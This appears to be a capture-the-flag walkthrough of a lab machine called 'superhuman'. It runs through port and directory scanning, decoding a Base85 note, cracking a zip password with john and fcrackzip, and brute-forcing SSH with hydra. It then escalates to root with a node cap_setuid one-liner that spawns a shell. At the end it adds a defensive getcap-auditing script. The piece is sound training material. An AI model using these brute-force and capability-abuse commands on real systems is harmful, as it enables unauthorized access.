Information gathering
Host discovery
arp-scan -l
Port scan
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.104
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 09:13 EDT
Nmap scan report for 192.168.254.104
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:C2:52:25 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scan
The page source contains a single image. Trying to extract hidden data from it turns up nothing, so the next step is to brute-force paths on the web server.
┌──(root㉿kali)-[/home/kali/Desktop]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip -u http://192.168.254.104/
/index.html (Status: 200) [Size: 658]
/nietzsche.jpg (Status: 200) [Size: 22211]
/notes-tips.txt (Status: 200) [Size: 358]
A txt file turns up; check what it contains.
Decode it with CyberChef: the Magic operation identifies the content as Base85, which decodes to:
salome doesn't want me, I'm so sad... i'm sure god is dead...
I drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.
I must not forget to save it and put a good extension because I don't have much storage.
The note means the poem is saved somewhere under the web root. Since it mentions limited storage, a good guess is a zip archive; if the name were not obvious, ffuf could fuzz for files ending in .zip instead.
192.168.254.104/salome_and_me.zip
The archive is password protected; either of two tools can crack it.
zip2john salome_and_me.zip > hash
┌──(root㉿kali)-[/home/kali/Downloads]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
turtle (salome_and_me.zip/salome_and_me.txt)
1g 0:00:00:00 DONE (2024-05-27 10:48) 33.33g/s 136533p/s 136533c/s 136533C/s 123456..oooooo
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Or use fcrackzip:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt salome_and_me.zip
PASSWORD FOUND!!!!: pw == turtle
The txt contains several personal names. With SSH exposed, names like these are worth collecting as candidate usernames and passwords, so extract them into a wordlist and run hydra against it.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# cat salome_and_me.txt
----------------------------------------------------
GREAT POEM FOR SALOME
----------------------------------------------------
My name is fred,
And tonight I'm sad, lonely and scared,
Because my love Salome prefers schopenhauer, asshole,
I hate him he's stupid, ugly and a peephole,
My darling I offered you a great switch,
And now you reject my love, bitch
I don't give a fuck, I'll go with another lady,
And she'll call me BABY!
Brute-force SSH with hydra:
┌──(root㉿kali)-[/home/kali/Downloads]
└─# hydra -L 123.txt -P 123.txt ssh://192.168.254.104
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-27 10:08:15
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://192.168.254.104:22/
[22][ssh] host: 192.168.254.104 login: fred password: schopenhauer
Getting a shell
ssh fred@192.168.254.104
The ls command is disabled, so read user.txt directly:
fred@superhuman:~$ tac user.txt
Ineedmorepower
Privilege escalation
- sudo -l: sudo is not installed
- no cron jobs to abuse
- find / -perm -u=s -type f 2>/dev/null: no exploitable SUID binaries either
- /usr/sbin/getcap -r / 2>/dev/null
One binary has a file capability set:
fred@superhuman:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
Reuse the standard cap_setuid technique for node and the escalation succeeds immediately:
fred@superhuman:~$ /usr/bin/node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'
# id
uid=0(root) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
# cd /root
# tac root.txt
Imthesuperhuman
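As an added example, not part of the original write-up, here is a POSIX sh helper that parses `getcap -r /` output and flags capabilities that amount to root when granted to a binary a low-privilege user can run, which is exactly what cap_setuid on /usr/bin/node was on this box. The sample getcap lines and the RISKY_CAPS list are my own construction.

```shell
#!/bin/sh
# Added audit helper (not from the original write-up): scan getcap output for
# capabilities that hand root to whoever can execute the binary, as cap_setuid
# on /usr/bin/node did in this write-up.

# Constructed getcap -r output. Line 1, 2 and 4 use the "path = caps+flags"
# format the write-up captured; line 3 uses the newer "path caps=flags" format.
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/node = cap_setuid+ep
/usr/bin/python3.7 cap_dac_read_search=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep'

# Capabilities that are root-equivalent on a binary whose code the caller
# controls (interpreters, editors, anything that can exec or write files).
RISKY_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_sys_admin cap_sys_ptrace cap_sys_module cap_fowner cap_chown"

# flag_risky_caps: read getcap lines on stdin, print "path capability" for
# every risky capability found.
flag_risky_caps() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    case $line in
      *" = "*) path=${line%%" = "*}; capset=${line#*" = "} ;;  # old libcap
      *)       path=${line% *};      capset=${line##* } ;;      # new libcap
    esac
    caps=${capset%%[+=]*}                  # drop the +ep / =ep flag suffix
    for cap in $(printf '%s' "$caps" | tr ',' ' '); do
      for risky in $RISKY_CAPS; do
        if [ "$cap" = "$risky" ]; then
          printf '%s %s\n' "$path" "$cap"
        fi
      done
    done
  done
}

# count_risky: number of findings in the constructed sample.
count_risky() {
  printf '%s\n' "$SAMPLE_GETCAP" | flag_risky_caps | wc -l | tr -d ' '
}

# audit_live: run the check against the real filesystem (getcap path as in
# the write-up; override with GETCAP=/path/to/getcap).
audit_live() {
  "${GETCAP:-/usr/sbin/getcap}" -r / 2>/dev/null | flag_risky_caps
}
```

On the machine in this write-up `audit_live` would report `/usr/bin/node cap_setuid`; the fix is to drop the capability with `setcap -r /usr/bin/node`, or to grant node only the specific capability it really needs instead of cap_setuid.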
Takeaways
- Information gathering and making good use of wordlists
- Abuse of Linux file capabilities